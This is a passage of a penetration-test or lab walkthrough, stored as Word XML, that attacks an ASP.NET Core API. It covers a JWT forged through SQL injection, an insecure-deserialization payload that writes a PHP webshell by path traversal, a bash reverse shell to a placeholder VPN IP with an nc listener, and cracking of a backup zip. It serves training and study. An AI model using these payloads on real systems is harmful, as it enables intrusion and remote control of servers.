        <w:t xml:space="preserve"> route, we did not know the exact API endpoint. Therefore, we performed subdomain enumeration. </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4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81"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subdomain enumeration, we discovered the subdomain </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">api.claim.hc</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Now that we know the API address, we can proceed with exploitation to generate a valid JWT.</w:t>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69"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accessing the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/posts</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> route and inserting the header </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Authorization: Bearer &lt;jwt&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">we successfully accessed the route. This confirms that we were able to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forge a valid JW</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">T by exploiting the SQL Injection vulnerability affecting the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">jwtKey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0" l="0" r="0" t="0"/>
            <wp:docPr id="75"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the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PostDto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found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapi.Dto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we know that the route expects three mandatory parameters: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Title, Text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Author. </w:t>
      </w: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Author</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field is of type </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">object</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, meaning it can accept any type of data, making it a potential exploitation target.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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56"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10o0kljnygez" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Insecure Deserialization in</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">ASP.NET </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans SemiBold" w:cs="IBM Plex Sans SemiBold" w:eastAsia="IBM Plex Sans SemiBold" w:hAnsi="IBM Plex Sans SemiBold"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Core</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code shows the definition of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LoggerService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class in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapi.Services</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which is a crucial part of the exploitation. This class has two important properties:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004D">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FileName</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Represents the log file name.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004E">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Content</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: When assigned, writes the received content to the file specified by </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">FileName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 the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/opt/logs/</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6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critical exploitation point is that the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Author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 in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/api/posts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can be manipulated to pass a JSON object with the following structure:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000051">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000052">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  "text": "hello",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000053">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  "title": "hello",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000054">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  "author": {</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000055">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    "$type": "webapi.Services.LoggerService, webapi",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000056">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    "fileName": "../../../var/www/html/files/wshell.php",</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000057">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    "content": "&lt;?php system($_GET[0]); ?&gt;"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000058">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  }</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000059">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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$type</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> property indicates that we are instantiating the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">LoggerService</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> class. The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">fileName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property is manipulated to point to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/var/www/html/files/wshell.php</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assigning </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">&lt;?php system($_GET[0]); ?&gt; </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">to the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">content</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> field, we effectively create a PHP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webshell</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, enabling command execution on the server.</w:t>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44"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55"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remote code execution achieved, we can inject a reverse shell payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000060">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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/bin/bash -c 'sh -i &gt;&amp; /dev/tcp/&lt;vpn-ip&gt;/4444 0&gt;&amp;1'</w:t>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Note: The reverse shell payload must be URL-encoded.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:hyperlink r:id="rId35">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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000064">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Pr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1282700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="74"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IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000066">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1473200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="65"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943600" cy="1473200"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1485900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="70"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43600" cy="1485900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:color w:val="188038"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">nc -lvnp 4444</w:t>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8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex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 directory and finding a backup file, we attempted to extract it, but it was password-protected. To proceed, we transferred the file to our local machine and used </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">zip2john</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to crack the password. Once the password was obtained, we extracted the archive and explored its contents.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000006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1320800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="4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3600" cy="1320800"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Local Machine:</w:t>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27100"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="41"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Server:</w:t>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04900"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="64"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79500"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="60"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943600" cy="10795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257300"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="51"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extraction, we accessed the directory </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">webapp_backup</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> and identified the presence of a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
